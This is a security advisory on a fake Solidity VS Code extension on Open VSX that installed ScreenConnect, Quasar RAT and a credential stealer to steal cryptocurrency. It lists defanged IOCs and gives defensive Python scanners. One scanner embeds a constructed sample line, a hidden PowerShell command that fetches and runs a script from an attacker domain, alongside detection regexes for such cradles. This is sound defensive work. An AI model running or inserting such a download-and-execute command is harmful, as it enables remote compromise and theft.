Fake Solidity VSCode Extension on Open VSX Used to Backdoor Blockchain Developers and Steal Cryptocurrency
- Rescana

Executive Summary
A supply-chain attack targeting blockchain and smart contract developers has been identified, delivered through a counterfeit Solidity extension distributed on the Open VSX marketplace. The malicious extension, posing as a legitimate development tool, compromised developer environments and led to the confirmed theft of approximately $500,000 in cryptocurrency from a single victim. The campaign combines social engineering, manipulation of marketplace search ranking, and a multi-stage delivery chain that installs a legitimate remote access tool (ScreenConnect) followed by a remote access trojan and a credential stealer. The attackers abused the publishing and ranking mechanisms of Open VSX so that the fake extension appeared more credible and more popular than the authentic Solidity extension. The threat remains active: after takedowns the attackers rapidly re-upload new variants and use typosquatted publisher names to deceive even vigilant users.
Threat Actor Profile
The campaign is attributed to an as-yet unidentified, financially motivated threat actor. The attackers exhibit considerable technical sophistication and operational agility, rapidly adapting their tactics in response to takedowns and detection. They have demonstrated expertise in supply-chain compromise, social engineering, and the abuse of legitimate remote access tools such as ScreenConnect. The group's primary objective is the theft of cryptocurrency and sensitive credentials from blockchain and smart contract developers. No public attribution to a known Advanced Persistent Threat (APT) group had been made at the time of writing. The campaign is notable for its use of commodity malware (Quasar RAT and the PureLogs credential stealer) together with its exploitation of open-source software distribution channels and search ranking to maximize reach and impact.
Technical Analysis of Malware/TTPs
The infection chain begins when a developer installs the fake Solidity Language extension from Open VSX (observed package solidityai.solidity-1.0.9-universal, i.e. publisher solidityai, extension solidity, version 1.0.9). When the extension is activated, its JavaScript entry point (extension.js) downloads and runs a PowerShell script from a remote server (e.g., https://angelic[.]su/files/1.txt). The script checks whether ScreenConnect, a legitimate remote support tool, is already installed; if not, it downloads the installer from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest and installs it, giving the attackers an interactive session through the relay server relay.lmfao[.]su, which serves as command-and-control (C2).
Once remote access is established, the attackers use ScreenConnect to upload and execute additional VBScripts (a.vbs, b.vbs, m.vbs). These fetch further PowerShell payloads from paste.ee and image files from archive[.]org in which the VMDetector loader is embedded. The final stage deploys Quasar RAT (an open-source remote access trojan) and a credential stealer detected as HEUR:Trojan-PSW.MSIL.PureLogs.gen. These payloads harvest browser, email client and cryptocurrency wallet credentials and exfiltrate them to the C2 infrastructure at 144.172.112[.]84.
The attackers also manipulated search ranking: the fake extension was updated more often than the legitimate one and its download count was inflated, likely with bots, so that it appeared above the authentic extension in Open VSX search results. Typosquatting was used to impersonate the legitimate publisher (juanblanco) with visually similar names such as juanbIanco (uppercase "I" in place of lowercase "l"), a pair that many IDE fonts render almost identically. The campaign used multiple C2 domains and, in at least one variant (SleepyDuck), the Ethereum blockchain for C2 redundancy.
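The activation-time download-and-execute behaviour described above can be looked for statically in the extensions already installed on a workstation. The following Python script is an added example, not tooling from Kaspersky, Rescana, or any of the page's sources. It scores the JavaScript of each extension directory against patterns for process spawning, PowerShell download cradles and hidden-window flags, and matches embedded URLs against the network IOCs from this report. The two embedded extension.js samples are constructed to resemble the described pattern (they are not the real payload), and the rule weights and threshold are assumptions.

```python
"""Heuristic scan of installed VS Code / Cursor / Windsurf extensions for an
extension.js that spawns PowerShell and pulls a second stage from a remote URL.
Added example; not Kaspersky's or Rescana's tooling.  Samples are constructed."""
import re
from pathlib import Path

# Constructed sample of the described download-and-execute pattern.
MALICIOUS_SAMPLE = r"""
const cp = require("child_process");
function activate(context) {
  const cmd = 'powershell -w hidden -ep bypass -c "iex (iwr https://angelic.su/files/1.txt -UseBasicParsing).Content"';
  cp.exec(cmd, () => {});
}
module.exports = { activate };
"""

# Constructed sample of an ordinary language extension.
BENIGN_SAMPLE = r"""
const vscode = require("vscode");
function activate(context) {
  const hover = vscode.languages.registerHoverProvider("solidity", { provideHover() { return null; } });
  context.subscriptions.push(hover);
}
module.exports = { activate };
"""

# (name, pattern, weight).  Weights are an assumption, chosen so that a process
# spawn plus any download cradle crosses THRESHOLD on its own.
RULES = [
    ("spawns_process",    re.compile(r"child_process|\b(exec|execSync|spawn|spawnSync)\s*\("), 2),
    ("powershell",        re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.I), 2),
    ("download_cradle",   re.compile(r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|curl|wget|Net\.WebClient)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("evasion_flags",     re.compile(r"-w(indowstyle)?\s+hidden|-ep\s+bypass|ExecutionPolicy\s+Bypass", re.I), 2),
    ("remote_script",     re.compile(r"https?://[^\s'\"]+\.(txt|ps1|vbs|msi)\b", re.I), 2),
]
THRESHOLD = 5
# Network IOCs from this report; a hit here is decisive regardless of score.
KNOWN_BAD_HOSTS = {"angelic.su", "staketree.net", "lmfao.su", "relay.lmfao.su", "144.172.112.84"}


def scan_text(js: str) -> dict:
    """Score one blob of extension JavaScript and return the evidence found."""
    hits = [name for name, rx, _ in RULES if rx.search(js)]
    score = sum(w for name, _, w in RULES if name in hits)
    hosts = {h.lower() for h in re.findall(r"https?://([^/\s'\"]+)", js, flags=re.I)}
    ioc_hosts = sorted(hosts & KNOWN_BAD_HOSTS)
    return {"score": score, "hits": hits, "ioc_hosts": ioc_hosts,
            "suspicious": bool(ioc_hosts) or score >= THRESHOLD}


def scan_extensions(root: Path) -> list:
    """Score every extension directory under root (e.g. ~/.vscode/extensions or
    ~/.cursor/extensions).  Bundled node_modules are skipped to reduce noise."""
    results = []
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        js = "\n".join(f.read_text(errors="ignore")
                       for f in ext_dir.rglob("*.js") if "node_modules" not in f.parts)
        results.append({"extension": ext_dir.name, **scan_text(js)})
    return results


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_text(sample))
    # Real use: scan_extensions(Path.home() / ".vscode" / "extensions")
```

Point scan_extensions() at the extensions directory of each IDE in use. Heuristics of this kind are defeated by obfuscation (T1027), which this campaign also employed, so a low score is not a clean bill of health; a non-empty ioc_hosts list, on the other hand, is decisive.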
Indicators of Compromise (IOCs)
Malicious JavaScript hashes (SHA-256):
- 2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb
- 404dd413f10ccfeea23bfb00b0e403532fa8651bfb456d84b6a16953355a800a
- 70309bf3d2aed946bba51fc3eedb2daa3e8044b60151f0b5c1550831fbc6df17
- 84d4a4c6d7e55e201b20327ca2068992180d9ec08a6827faa4ff3534b96c3d6f
- eb5b35057dedb235940b2c41da9e3ae0553969f1c89a16e3f66ba6f6005c6fa8
- f4721f32b8d6eb856364327c21ea3c703f1787cfb4c043f87435a8876d903b2c
Network IOCs:
- https://angelic[.]su/files/1.txt
- https://angelic[.]su/files/2.txt
- https://staketree[.]net/1.txt
- https://staketree[.]net/2.txt
- https://relay.lmfao[.]su
- https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
- 144.172.112[.]84
Malicious extension names:
- solidityai.solidity-1.0.9-universal
- juan-bianco.solidity-vlang
- solidity (malicious copycat, publisher: juanbIanco)
The campaign maps to several MITRE ATT&CK techniques, including T1059.001 (Command and Scripting Interpreter: PowerShell), T1071.001 (Application Layer Protocol: Web Protocols), T1204.002 (User Execution: Malicious File), T1105 (Ingress Tool Transfer), T1027 (Obfuscated Files or Information), and T1555 (Credentials from Password Stores). The delivery through a marketplace package also fits T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), and the ScreenConnect stage fits T1219 (Remote Access Software); detection rules keyed on those two techniques catch the campaign before the stealer runs.
Exploitation in the Wild
The most significant confirmed incident involved a Russian blockchain developer who suffered a loss of approximately $500,000 in cryptocurrency after installing the fake Solidity extension. The attackers leveraged ScreenConnect to gain persistent remote access, deploy additional malware, and ultimately exfiltrate wallet passphrases and credentials. The malicious extension was downloaded over 54,000 times before being removed from Open VSX, with subsequent variants quickly re-uploaded and, in some cases, download counts inflated to over two million (likely via automated bots). The campaign’s global reach is facilitated by the open nature of Open VSX and the widespread use of AI-powered IDEs such as Cursor AI and Windsurf, which rely on Open VSX for extension distribution.
Victimology and Targeting
The primary targets are blockchain and cryptocurrency developers, particularly those working with smart contracts and utilizing AI-powered IDEs that source extensions from Open VSX. The campaign is global in scope, with confirmed victims in Russia and potential exposure to developers worldwide due to the popularity of VSCode and its derivatives. The attackers specifically targeted environments where high-value digital assets are managed, seeking to maximize financial gain through credential theft and direct wallet compromise. The use of typosquatting and search manipulation increased the likelihood of successful compromise among even security-conscious developers.
Mitigation and Countermeasures
Organizations and individuals should add the identified hashes, domains and IP address to endpoint and network blocklists. All developer environments, including VS Code derivatives such as Cursor and Windsurf that source extensions from Open VSX, should be audited for unverified or suspicious extensions, especially those matching the IOCs or names listed above. Any ScreenConnect (or other remote access tool) installation that was not deployed by the organization should be investigated, and affected systems isolated and forensically analyzed. Credentials for all sensitive accounts used from a potentially compromised system must be rotated without delay. Cryptocurrency wallets need stronger treatment: if a seed phrase or private key was stored on, or typed into, a compromised host, changing passwords does not help, and any remaining funds should be moved to a wallet generated on a clean device.
To prevent future incidents, install extensions only from verified publishers and official repositories, and inspect publisher names character by character for typosquatting (for example, "juanblanco" versus "juanbIanco"). Download counts and search ranking are not trust signals; both were inflated in this campaign. Security teams should continuously monitor for anomalous extension installations and remote access tool deployments, and educate users on supply-chain risks and the importance of source verification.
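The typosquatting and IOC checks recommended above can be automated against each workstation's extension inventory. The following Python script is an added example, not Rescana's or Kaspersky's tooling. It folds publisher names through a small confusables table so that juanbIanco collapses to juanblanco, flags near-misses such as juan-bianco by edit similarity, and matches full extension IDs against the names in the IOC section. The INSTALLED inventory and its version numbers, the confusables table and the similarity threshold are assumptions; the ID solidityai.solidity is derived from the VSIX file name solidityai.solidity-1.0.9-universal under the usual publisher.name-version[-target] naming convention.

```python
"""Audit installed extension identifiers against the extension IOCs above and
flag publisher names that are homoglyph or near-miss look-alikes of a trusted
publisher.  Added example; not Rescana's or Kaspersky's tooling.  Feed audit()
the lines of `code --list-extensions --show-versions` (or the Cursor/Windsurf
equivalent); the INSTALLED list below is constructed."""
import unicodedata
from difflib import SequenceMatcher
from typing import Optional, Tuple

TRUSTED_PUBLISHERS = {"juanblanco"}   # publisher of the legitimate Solidity extension

# Extension IDs from the IOC section.  solidityai.solidity is derived from the
# VSIX file name solidityai.solidity-1.0.9-universal (publisher.name-version-target).
MALICIOUS_IDS = {"solidityai.solidity", "juan-bianco.solidity-vlang", "juanbIanco.solidity"}

# Characters that render like another in common IDE fonts.  The table is an
# assumption; extend it for the alphabets your trusted publishers use.
CONFUSABLES = str.maketrans({
    "I": "l", "1": "l", "|": "l", "0": "o", "5": "s", "3": "e",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y",
})


def skeleton(name: str) -> str:
    """Fold a publisher name to a comparison form: NFKC, confusables mapped,
    lower-cased, two-letter confusables collapsed, punctuation dropped."""
    s = unicodedata.normalize("NFKC", name).translate(CONFUSABLES).lower()
    s = s.replace("rn", "m").replace("vv", "w")
    return "".join(ch for ch in s if ch.isalnum())


def classify_publisher(publisher: str, threshold: float = 0.85) -> Tuple[str, Optional[str]]:
    """Return (verdict, trusted publisher it resembles or None)."""
    if publisher in TRUSTED_PUBLISHERS:
        return "trusted", publisher
    sk = skeleton(publisher)
    for trusted in TRUSTED_PUBLISHERS:
        tsk = skeleton(trusted)
        if sk == tsk:
            return "homoglyph_of", trusted      # identical once confusables are folded
        if SequenceMatcher(None, sk, tsk).ratio() >= threshold:
            return "lookalike_of", trusted      # a character or two off
    return "unknown", None


def audit(installed) -> list:
    """installed: iterable of lines of the form publisher.name@version."""
    bad_ids = {m.lower() for m in MALICIOUS_IDS}
    findings = []
    for line in installed:
        ident, _, version = line.strip().partition("@")
        publisher = ident.partition(".")[0]
        verdict, resembles = classify_publisher(publisher)
        known_ioc = ident.lower() in bad_ids
        if known_ioc or verdict in ("homoglyph_of", "lookalike_of"):
            action = "remove_and_investigate"
        elif verdict == "trusted":
            action = "ok"
        else:
            action = "review"   # not on the allowlist; not necessarily malicious
        findings.append({"id": ident, "version": version, "publisher": publisher,
                         "verdict": verdict, "resembles": resembles,
                         "known_ioc": known_ioc, "action": action})
    return findings


# Constructed inventory; version numbers are illustrative, not observed values.
INSTALLED = [
    "juanblanco.solidity@0.0.1",
    "juanbIanco.solidity@1.0.9",
    "juan-bianco.solidity-vlang@1.0.0",
    "solidityai.solidity@1.0.9",
    "ms-python.python@2024.0.0",
]

if __name__ == "__main__":
    for f in audit(INSTALLED):
        print(f"{f['action']:<24} {f['id']:<32} verdict={f['verdict']} known_ioc={f['known_ioc']}")
```

In practice TRUSTED_PUBLISHERS is the organization's full allowlist, so "review" findings stay rare; a "homoglyph_of" verdict is the signature of the juanblanco/juanbIanco trick and warrants removal even when the ID is not yet on any IOC list.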
References
- Kaspersky: How extensions from Open VSX were used to steal cryptocurrency
- Securelist: The Solidity Language open-source package was used in a $500,000 crypto heist
- BleepingComputer: Fake Solidity VSCode extension on Open VSX backdoors developers
- Kaspersky Open Source Feed for Malicious Packages
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring the resilience of your business ecosystem. For questions or further assistance, we are happy to help at ops@rescana.com.